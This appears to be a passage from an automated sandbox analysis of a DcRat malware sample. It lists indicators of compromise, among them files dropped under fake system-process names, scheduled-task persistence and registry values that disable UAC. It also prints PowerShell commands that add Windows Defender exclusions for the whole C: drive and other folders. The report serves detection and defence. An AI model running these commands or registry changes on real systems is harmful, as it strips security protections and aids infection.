File created	C:\Program Files (x86)\Google\csrss.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Google\886983d96e3d3e	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\de-DE\lsass.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Defender\886983d96e3d3e	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\RCXAE88.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\RCXBD7E.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Google\csrss.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Journal\de-DE\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\cc11b995f2a76d	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Windows Portable Devices\WmiPrvSE.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\dwm.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCXB495.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\de-DE\RCXBB7B.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Photo Viewer\fr-FR\audiodg.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\fr-FR\audiodg.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Microsoft Games\Hearts\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\lsass.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\RCXB08C.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

Drops file in Windows directory 13 IoCs

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

description	ioc	process
File opened for modification	C:\Windows\SchCache\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\PolicyDefinitions\de-DE\explorer.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\PolicyDefinitions\de-DE\7a0fd90576e088	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\SchCache\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Windows\SchCache\RCXB977.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\L2Schemas\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\L2Schemas\cc11b995f2a76d	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\Vss\Writers\WmiPrvSE.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\Vss\Writers\24dbde2999530e	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Windows\L2Schemas\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Windows\PolicyDefinitions\de-DE\explorer.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Windows\SchCache\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Windows\Vss\Writers\WmiPrvSE.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
2432	schtasks.exe
2664	schtasks.exe
1248	schtasks.exe
2756	schtasks.exe
2828	schtasks.exe
1772	schtasks.exe
2636	schtasks.exe
2028	schtasks.exe
1292	schtasks.exe
2252	schtasks.exe
2656	schtasks.exe
1916	schtasks.exe
1844	schtasks.exe
2820	schtasks.exe
3028	schtasks.exe
2724	schtasks.exe
1712	schtasks.exe
2280	schtasks.exe
2992	schtasks.exe
792	schtasks.exe
1676	schtasks.exe
2140	schtasks.exe
2036	schtasks.exe
2472	schtasks.exe
2888	schtasks.exe
768	schtasks.exe
2648	schtasks.exe
1408	schtasks.exe
1588	schtasks.exe
1988	schtasks.exe
1924	schtasks.exe
1836	schtasks.exe
2636	schtasks.exe
2040	schtasks.exe
2500	schtasks.exe
1220	schtasks.exe
2080	schtasks.exe
2824	schtasks.exe
2996	schtasks.exe
2980	schtasks.exe
1256	schtasks.exe
956	schtasks.exe
3012	schtasks.exe
676	schtasks.exe
800	schtasks.exe
2940	schtasks.exe
1756	schtasks.exe
1792	schtasks.exe
2524	schtasks.exe
2256	schtasks.exe
2540	schtasks.exe
1856	schtasks.exe
1496	schtasks.exe
2184	schtasks.exe
2772	schtasks.exe
2792	schtasks.exe
1520	schtasks.exe
1940	schtasks.exe
2132	schtasks.exe
2644	schtasks.exe
2808	schtasks.exe
1712	schtasks.exe
2428	schtasks.exe
2860	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exe

pid	process
292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
1932	powershell.exe
2856	powershell.exe
2532	powershell.exe
1752	powershell.exe
1912	powershell.exe
2164	powershell.exe
2500	powershell.exe
792	powershell.exe
1540	powershell.exe
2160	powershell.exe
2156	powershell.exe
2568	powershell.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
3064	powershell.exe
2596	powershell.exe
2264	powershell.exe
2700	powershell.exe
1704	powershell.exe
1720	powershell.exe
2032	powershell.exe
2688	powershell.exe
3060	powershell.exe
2008	powershell.exe
2136	powershell.exe
1988	powershell.exe
292	lsass.exe
960	lsass.exe
2464	lsass.exe
1416	lsass.exe
2332	lsass.exe
2612	lsass.exe
1424	lsass.exe
1788	lsass.exe
2088	lsass.exe
1564	lsass.exe
1932	lsass.exe
1992	lsass.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	292	lsass.exe
Token: SeDebugPrivilege	960	lsass.exe
Token: SeDebugPrivilege	2464	lsass.exe
Token: SeDebugPrivilege	1416	lsass.exe
Token: SeDebugPrivilege	2332	lsass.exe
Token: SeDebugPrivilege	2612	lsass.exe
Token: SeDebugPrivilege	1424	lsass.exe
Token: SeDebugPrivilege	1788	lsass.exe
Token: SeDebugPrivilege	2088	lsass.exe
Token: SeDebugPrivilege	1564	lsass.exe
Token: SeDebugPrivilege	1932	lsass.exe
Token: SeDebugPrivilege	1992	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.execmd.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

description	pid	process	target process
PID 292 wrote to memory of 1932	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1932	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1932	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 792	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 792	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 792	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1912	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1912	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1912	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1540	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1540	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1540	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2856	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2856	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2856	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2156	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2156	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2156	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2532	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2532	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2532	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2568	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2568	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2568	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2160	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2160	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2160	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2500	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2500	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2500	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1752	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1752	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 1752	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2164	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2164	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2164	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 292 wrote to memory of 2188	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	cmd.exe
PID 292 wrote to memory of 2188	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	cmd.exe
PID 292 wrote to memory of 2188	292	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	cmd.exe
PID 2188 wrote to memory of 1772	2188	cmd.exe	w32tm.exe
PID 2188 wrote to memory of 1772	2188	cmd.exe	w32tm.exe
PID 2188 wrote to memory of 1772	2188	cmd.exe	w32tm.exe
PID 2188 wrote to memory of 2332	2188	cmd.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
PID 2188 wrote to memory of 2332	2188	cmd.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
PID 2188 wrote to memory of 2332	2188	cmd.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
PID 2332 wrote to memory of 1704	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 1704	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 1704	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 3060	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 3060	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 3060	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2596	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2596	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2596	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2264	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2264	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2264	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2700	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2700	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2700	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2688	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2688	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 2688	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe
PID 2332 wrote to memory of 3064	2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe	powershell.exe

System policy modification 1 TTPs 42 IoCs

evasion

Modify Registry

T1112

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exelsass.exelsass.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
"C:\Users\Admin\AppData\Local\Temp\6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe"
1⤵
- DcRat
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
